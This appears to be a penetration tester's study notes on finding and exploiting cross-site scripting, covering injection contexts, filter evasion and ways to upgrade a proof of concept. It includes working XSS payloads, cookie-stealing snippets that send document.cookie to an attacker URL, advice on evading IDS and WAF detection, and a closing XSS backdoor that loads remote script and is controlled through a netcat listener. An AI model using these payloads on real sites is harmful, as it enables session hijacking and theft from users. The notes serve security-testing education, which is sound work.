Discovery Tests
Various types of payloads should be used in discovery. |
Reflection tests use simple but unique strings to determine if the input is reflected. 86868686 |
Filter tests use characters to determine if there is filtering or encoding present. < > ( ) = ' " / ; [ ] $ -- # & // |
POC payloads are input meant to attempt to demonstrate the presence of CSS **<script>alert("Hello!");</script> |
XSS Injection Points
Any user controllable app iput could prove vulnerable. |
Submit innocuous but unique strings that allow for identification of our input in the response |
Entry points include: URL query parameter POST parameters HTTP headers including User-Agent, Referer, Cookie |
Reflection Tests
Reflected XSS provides immediate response reflected in input. |
Stored XSS may not be immediately rendered and can be in a totally different area of the app. |
Unique variations of the input should be used o allow for easier identification of input resulting in XSS. |
Common XSS Injection Contexts
Injection context is understanding the contextual details of the response containing our input. It is critical to having JavaScript execute where our input lands. |
Most common XSS injection contexts: HTML, Tag attribute, and existing JavaScript code |
HTML Considerations: The payload can be self-contained and doesn't require a particular prefix or suffix due to the context. |
Tag Attribute Considerations: The prefix option to close value assignment and possibly lose the tag ">. Suffix usage is dependent on injected tags. |
Existing JavaScript Considerations Suffix options include JS line terminator ; and sngle line comment delimiter //. Often will be within a JS function so closing paranthesis might also be needed ) |
HTML Example
Payload: <img src="x" onerror=alert("attack!");/>
Resulting HTML: <div><p>Are you ready? <img src="x" onerror=alert("attack!");/></p></div>
Tag Attribute Example
Event Injection: 868686" onload="alert(86)
Resultant HTML: <input type="text" name="xss" value="868686" onload="alert(86)">
Existing JavaScript Example
Payload: **86";alert(86);//
Resultant HTML: <script>var Variable="86";alert(86);//"; </script>
Filter Tests and Bypass/Evasion
Discovering injection points that yield immediate or delayed reflection != XSS vulnerability |
The next step would be to test for the presence and efficacy of filtering and encoding, as these are increasingly common |
Most filtering utilizing blacklisting leaving room for evasion or bypass. |
Goal is to determine whether and how filter/encoding is employed for successfully crafting XSS payloads. |
Target XSS payloads that specifically do NOT require filtered characters. |
Craft the payload to escape filter logic. |
Encode the data to confuse or bypass the filter. |
The <script> tag is one of the most commonly filtered tags, and next the angle brackets, but events can reference JavaScript without these. DOM Event Handlers sometimes provide a bypass, such as using onerror with a broken link. |
Browser False Negatives
XSS payload execution depends on the particular vendor and version of the browser. |
Most major browsers now have built-in XSS filtering capabilities. When testing for XSS a tester must make sure the browser isn't blocking the attack payload. |
Options: Use Firefox until it has active XSS filter, though it uses Content-Security-Policy HTTP header it is not a formal standard Use an older browser, though this can cause issues in rendering HTML5 or non-eval() JSON parsing Fully disable XSS filtering |
Remember the browser is not the focus of the assessment. |
POC Payloads
There are prepared fuzzing payload collections including Fuzzdb, JBroFuzz (part of ZAP), Burp, ZAP (JBroFuzz/fuzzdb), and XSSer |
Considerations should be made for stealth, by decreasing speed and changing payloads detection by IDS and WAFs can be reduced. |
Upgrades to alert( )
POC will be a static alert(x), confirm(x) or prompt(x, y) |
Demonstrate domain application context with alert(document.domain) or confirm(document.domain) |
Demonstrate session/content abuses with document.cookie or forged in-session Requests or defacement |
Demonstrate external JavaScript loading with src="//" |
Demonstrate advanced user attacks with framework through the use of BruteLogic XSS Shell, BeEF, Metasploit escalation, etc. |
Session Hijacking
Achieved by stealing the tokens for a user's active session and reusing them. |
Injected script is presented from the same origin as the session token, which allows for interaction directly with the page's DOM. |
Key properties, methods and events for session hijacking: document.cookie is the most common target document.URL query parameter document.forms are hidden form fields and CSRF tokens |
Using location to send data to a server we control will redirect the victim's browser which makes the attack more obvious. Example: location='URL'+document.cookie, location.replace('URL'+document.cookie) |
Instead of using location, the fetch() API and function may also be used. |
Note: document.location and window.location are relatively interchangeable.
Session Theft Without Redirection
For less obvious session theft create a broken image that points to the cookie catching JavaScript. |
<script>img=new Image(); img.src='url/cookiecatcher.php?='+document.cookie'</script> |
This assumes there is no HttpOnly flag set, which will restrict interaction with cookies to HTML only. |
Leveraging HTTPS can help bypass egress filtering and so there is not issue with a Secure flag. |
BruteLogic Interactive XSS Backdoor
XSS Injection
<svg onload=setInterval(function() {d=document; z=d.createElement("script"); z.src="URI"; d.body.appendChild(z)}, 0)>
Shell Controller (Terminal on Attacker Machine)
while: ; to printf "j $; read c; echo $c | nc -lvvp 1234 > /dev/null; done |